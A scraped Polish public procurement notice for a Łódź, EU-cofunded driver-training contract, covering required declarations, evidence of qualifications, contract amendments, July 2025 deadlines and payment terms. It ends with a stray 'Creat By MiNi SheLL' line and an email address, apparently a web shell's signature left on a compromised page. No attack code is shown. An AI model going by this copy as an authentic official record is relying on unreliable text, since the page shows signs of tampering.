WRAZ Z OFERTĄ:<br/>1.	W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z postępowania o udzielenie zamówienia publicznego w okolicznościach o których mowa w art. 108 ust. 1 oraz na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego, Wykonawca dołącza do oferty aktualne na dzień składania ofert oświadczenie, o którym mowa w art. 125 ust. 1 Upzp dotyczące przesłanek wykluczenia z postępowania, którego wzór stanowi załącznik nr 2 do SWZ.<br/>2.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o którym mowa w pkt. 1 składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <br/>3.	Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa <br/>w pkt. 1 , także oświadczenie (zobowiązanie) podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu. Wzór stanowi załącznik nr 8 do SWZ.<br/>B. DOKUMENTY SKŁADANE PO OTWARCIU OFERT:<br/>1.	Zamawiający przed wyborem najkorzystniejszej oferty wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia podmiotowych środków dowodowych potwierdzających:<br/>1)	brak podstaw wykluczenia z postępowania o udzielenie zamówienia, <br/>o których mowa w art. 108 Upzp tj.:<br/>a)	art. 108 ust. 1 pkt. 5 Upzp - oświadczenia wykonawcy o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz.U.2024.1616 t.j.) z innym Wykonawcą, który złożył odrębną ofertę lub ofertę częściową albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty lub oferty częściowej niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej;<br/>Wzór oświadczenia zostanie udostępniony przez Zamawiającego wraz <br/>z wezwaniem Wykonawcy do złożenia oświadczeń i dokumentów.<br/>Uwaga: W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia i dokumenty, o których mowa w powyższym punkcie składa każdy z nich.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">A. DOKUMENTY SKŁADANE WRAZ Z OFERTĄ:<br/>1. W celu potwierdzenia spełniania warunku udziału w postępowaniu Wykonawca dołącza do oferty aktualne na dzień składania ofert oświadczenie, o którym mowa w art. 125 ust. 1 Upzp dotyczące spełniania warunku udziału w postępowaniu, którego wzór stanowi załącznik nr 3 do SWZ.<br/>2.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o którym mowa w pkt. 1 składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te powinny potwierdzać spełnianie warunku udziału w postępowaniu .<br/>2.1.	Ponadto, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie na podstawie art. 117 ust. 4 Upzp, z którego wynika które dostawy lub usługi wykonają poszczególni Wykonawcy (załącznik nr 9 do SWZ).<br/>3.	Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w pkt. 1 , także oświadczenie (zobowiązanie) podmiotu udostępniającego zasoby, potwierdzające spełnianie warunków udziału w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na jego zasoby. Wzór stanowi załącznik nr 8 do SWZ.<br/>B. DOKUMENTY SKŁADANE PO OTWARCIU OFERT:<br/>1.	Zamawiający przed wyborem najkorzystniejszej oferty wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia podmiotowych środków dowodowych potwierdzających spełnianie przez Wykonawcę warunku udziału w postępowaniu dotyczącego zdolności technicznej i zawodowej (Dział X pkt. 2 ppkt. 2.1.):<br/>a)	wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za osobiste świadczenie usługi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia niezbędnych do wykonania zamówienia publicznego, zakresu wykonywanych przez nie czynności wraz z informacją o podstawie do dysponowania tymi osobami.<br/>Wzór oświadczenia (Wykaz osób) stanowi załącznik nr 6 do SWZ,	<br/>b)	wykaz pojazdów przeznaczonych do świadczenia usługi wraz z informacją <br/>o podstawie do dysponowania tymi pojazdami,<br/>Wzór oświadczenia (Wykaz pojazdów) stanowi załącznik nr 10 do SWZ,	<br/>c)	wskazanie danych określających lokalizację sali szkoleniowej wyposażonej w niezbędne narzędzia dydaktyczne do praktycznej nauki jazdy w tym w szczególności w symulator nauki jazdy w warunkach specjalnych dla kategorii C oraz C+E wraz z informacją o podstawie do dysponowania tym zasobem,<br/>Wzór oświadczenia (Lokalizacja Sali szkoleniowej) stanowi załącznik nr 11 do SWZ,</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.	Zamawiający wymaga przedłożenia przedmiotowych środków dowodowych wyłącznie od Wykonawców ubiegających się o przyznanie punktów dodatkowych w pozacenowych kryteriach oceny ofert. <br/>2.	Przedmiotowe środki dowodowe, których złożenia wymaga Zamawiający, składa się wraz z ofertą. <br/>3.	Zamawiający wymaga od Wykonawców przedłożenia wraz z ofertą następujących przedmiotowych środków dowodowych:<br/>a)	opracowanego przez Wykonawcę Wykazu osób (wzór stanowi załącznik nr 6 do SWZ) będącego podstawą do badania oferty, a także możliwości przyznania punktów dodatkowych i ustalenia przez Zamawiającego oferty najkorzystniejszej. Przepisy dotyczące procedury badania spełniania przez Wykonawcę warunków przyznania punktów dodatkowych opisane zostały w SWZ poz. Dział XXII w pkt. 4 z podpunktami,<br/>b)	opracowanego przez Wykonawcę Wykazu pojazdów (wzór stanowi załącznik nr 10 do SWZ). Przepisy dotyczące procedury badania spełniania przez Wykonawcę warunków przyznania punktów dodatkowych opisane zostały w SWZ poz. Dział XXII w pkt. 3 i 4 z podpunktami,<br/>4.	W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących złożonych przedmiotowych środków dowodowych.<br/>5.	W przypadku, gdy Wykonawca nie złoży wraz z ofertą dokumentów o których mowa pkt. 3 lit. a)-b) lub złoży dokument niekompletny lub taki – w oparciu o który Zamawiający nie będzie mógł w sposób jednoznaczny ocenić, czy Wykonawca spełnia warunki przyznania punktów dodatkowych, Zamawiający nie przyzna Wykonawcy punktów dodatkowych w pozacenowych kryteriach oceny ofert. Oferta Wykonawcy może być dalej przedmiotem badania w zakresie wykazania przez Wykonawcę spełniania warunków udziału w postępowaniu. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca dołącza do oferty pełnomocnictwo, jeżeli Wykonawca samodzielnie składający ofertę jest reprezentowany przez pełnomocnika; <br/>a)	Gdy umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych, wykonawca, który składa ofertę za pośrednictwem pełnomocnika, powinien dołączyć do oferty dokument pełnomocnictwa obejmujący swym zakresem umocowanie do złożenia oferty lub do złożenia oferty i podpisania umowy. <br/>b)	W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia wykonawcy zobowiązani są do ustanowienia pełnomocnika. Dokument pełnomocnictwa, z treści którego będzie wynikało umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia tych wykonawców należy załączyć do oferty. <br/>c)	Pełnomocnictwo powinno być załączone do oferty i powinno zawierać <br/>w szczególności wskazanie: <br/>- postępowania o zamówienie publiczne, którego dotyczy, <br/>- wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby, <br/>- ustanowionego pełnomocnika oraz zakresu jego umocowania. <br/>d)	Jeżeli pełnomocnictwo zostało wystawione jako dokument elektroniczny, przekazuje się ten dokument. W przypadku, gdy Wykonawca będzie dysponował jedynie pełnomocnictwem w formie papierowej, przekazuje cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, poświadczające zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej. <br/>e)	Wyżej wymienionego poświadczenia zgodności cyfrowego odwzorowania <br/>z dokumentem w postaci papierowej, o którym mowa w lit. d), w przypadku dokumentów potwierdzających umocowanie do reprezentowania dokonuje odpowiednio Wykonawca, Wykonawca wspólnie ubiegający się o udzielenie zamówienia, podmiot udostępniający zasoby lub podwykonawca, w zakresie, który każdego z nich dotyczy. <br/>f)	Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej, może dokonać również notariusz. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (możliwość składania jednej oferty przez dwa lub więcej podmiotów np. konsorcjum firm, spółkę cywilną), pod warunkiem, że taka oferta będzie spełniać następujące wymagania:<br/>1) Wykonawcy wspólnie ubiegający się o zamówienie muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego;<br/>2) Wykonawcy wspólnie ubiegający się o zamówienie przedłożą wraz z ofertą stosowny dokument (pełnomocnictwo) potwierdzający umocowanie pełnomocnika, o którym mowa w pkt. 1;<br/>3) oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie (przez każdego z Wykonawców lub pełnomocnika);<br/>4) korespondencja będzie prowadzona wyłącznie z Wykonawcą występującym jako Pełnomocnik pozostałych.<br/>2. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenia o braku podstaw do wykluczenia (wzór stanowi załącznik nr 2 do SWZ) oraz o spełnianiu warunków udziału w postępowaniu (wzór stanowi załącznik nr 3 do SWZ) składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te powinny potwierdzać spełnianie<br/>warunku udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>2.1. Ponadto, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie na podstawie art. 117 ust. 4 Upzp, z którego wynika które dostawy lub usługi wykonają poszczególni Wykonawcy (załącznik nr 9 do SWZ). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Postanowienia dotyczące waloryzacji wynagrodzenia Zleceniobiorcy, wprowadzone na podstawie przepisów ustawy z dnia 7 października 2022 r. o zmianie niektórych ustaw w celu uproszczenia procedur administracyjnych dla obywateli i przedsiębiorców (Dz. U. 2022 poz. 2185):<br/>1.1. Wysokość wynagrodzenia określonego w umowie, może ulec zmianie na zasadach określonych w projekcie umowy (załącznik nr 4 do SWZ) w przypadku zmiany ceny materiałów lub kosztów związanych z realizacją Umowy.<br/>1.2. Zleceniodawca przewiduje waloryzację wynagrodzenia Zleceniobiorcy z tytułu realizacji Umowy raz w każdym roku kalendarzowym trwania umowy jednak nie wcześniej niż po 6 (sześciu) miesiącach od dnia zawarcia Umowy (początkowym terminem ustalenia zmiany wynagrodzenia Zleceniobiorcy będzie miesiąc kalendarzowy następujący po miesiącu, w którym<br/>wystąpiły okoliczności powodujące zmianę).<br/>(...)<br/>2. Zleceniodawca dopuszcza możliwość zmiany postanowień umowy w wyniku działania siły wyższej, za zgodą obydwu stron, w szczególności w sytuacji:<br/>a) konieczności dokonania zmian terminów rozpoczęcia lub zakończenia realizacji usług – w sytuacjach przewidzianych w SWZ i/lub niniejszej umowie. <br/>b) gdy wystąpią czynniki zewnętrzne niezależne od Zleceniodawcy i Zleceniobiorcy, które nie pozwalają na prawidłowe wykonanie zamówienia,<br/>c) gdy pojawią się nieprzewidziane oraz niezawinione przez Zleceniodawcę lub Zleceniobiorcę okoliczności powodujące, iż realizacja Projektu nie może być kontynuowana. <br/>d) zmiany umowy w zakresie zmiany terminów płatności w przypadku konieczności dokonania zmiany wynikającej z realizacji Projektu.<br/>2.1. Ponadto, Zleceniodawca przewiduje możliwość wprowadzenia zmian do umowy w zakresie terminu jej wykonania o którym mowa w § 3 pkt. 2, w przypadku wystąpienia opóźnień po stronie Zleceniodawcy, które uniemożliwiają Zleceniobiorcy realizację przedmiotu umowy w tym terminie,<br/>2.2. Zmiany umowy dotyczące terminu realizacji, powodujące i skutkujące wydłużeniem terminu realizacji Przedmiotu Umowy (wykonania Umowy) w zakresie czasowym wykraczającym poza ramy realizacji Projektu, będą możliwe jedynie w przypadku, gdy Zleceniodawca uzyska zgodę na wydłużenie terminu realizacji Projektu. Zmiany terminu realizacji Przedmiotu Umowy nie mają wypływu na wysokość wynagrodzenia Zleceniobiorcy, a Zleceniobiorca nie może odmówić świadczenia usługi na warunkach określonych w złożonej przez siebie ofercie. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-07-17 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę w formie elektronicznej (opatrzoną kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym lub kwalifikowanym podpisem elektronicznym należy złożyć w terminie składania ofert za pośrednictwem Platformy e-Zamówienia dostępnej pod adresem https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-07-17 16:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-08-15</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający jest zainteresowany możliwie jak najszybszym rozpoczęciem realizacji Projektu, świadczenie usługi może rozpocząć się przed początkowym terminem, o którym mowa w pkt. 1 pod warunkiem, że:<br/>a) sytuacja ta wynika wprost z przebiegu procedury niniejszego postępowania przetargowego,<br/>b) Wykonawca wyrazi pisemną gotowość przystąpienia do realizacji usługi w pełnym zakresie w terminie zaproponowanym przez Zamawiającego. <br/>2. Uzgodnienia dotyczące rozliczeń. <br/>2.1. Zamawiający informuje, iż wynagrodzenie należne Wykonawcy będzie płatne w sposób określony w pkt. 2.4., pod warunkiem dostępności środków na koncie Projektu i pod warunkiem uchwalenia planu wydatków do Projektu przez Radę Miasta Łodzi do projektu na dany rok kalendarzowy. <br/>2.2. W związku z powyższym, składając ofertę Wykonawca oświadcza że:<br/>a)	akceptuje przyjęty sposób rozliczenia umowy i zgadza się na przystąpienie do realizacji umowy w pełnym zakresie także w sytuacji, gdy Zamawiający nie może potwierdzić uchwalenia planu wydatków do Projektu lub dostępności środków na koncie Projektu,<br/>b)	w przypadku wystawienia faktur lub rachunków za wykonanie usługi <br/>i braku zapłaty przez Zamawiającego z uwagi na okoliczności o których mowa <br/>w pkt. 2.1. nie będzie naliczał i dochodził odsetek za zwłokę, jak również nie będzie występował wobec Zamawiającego o jakiekolwiek roszczenia z tego tytułu, <br/>- o ile zwłoka w zapłacie przez Zamawiającego wynagrodzenia należnego Wykonawcy w obydwu ww. przypadkach nie przekroczy 30 dni kalendarzowych licząc od dnia następującego po dniu, w którym wypada ostatni dzień umownego terminu płatności.<br/>2.3. Zamawiający informuje, iż w związku z faktem, iż przedmiot zamówienia jest współfinansowany ze środków UE, zastrzega sobie prawo do niezrealizowania z obiektywnych przyczyn niezależnych od Zamawiającego, całości (np. w przypadku niepodpisania umowy o dofinansowanie z Instytucją Zarządzającą lub nie otrzymania transzy środków finansowych na konto projektu) lub części zamówienia, bez prawa regresu ze strony Wykonawcy. <br/>2.4. Wynagrodzenie będzie płatne co do zasady w ujęciu miesięcznym – po zakończeniu realizacji usługi w danym miesiącu, na podstawie przyjętego przez Zamawiającego rozliczenia wypracowanych nakładów (godzin) – z zastrzeżeniem pkt. 2.5.<br/>2.5. UWAGA! Wynagrodzenie z tytułu wykonania zamówienia w okresie obejmującym I Edycję (w odniesieniu do zadania nr 1 i 3), zostanie wypłacone Wykonawcy po wykonaniu całości tego zadania co nastąpi wg wstępnych założeń realizacji Projektu w lutym 2026 r. <br/>2.6. Składając ofertę Wykonawca oświadcza, że akceptuje powyższe postanowienia dotyczące rozliczeń.

Creat By MiNi SheLL
Email: jattceo@gmail.com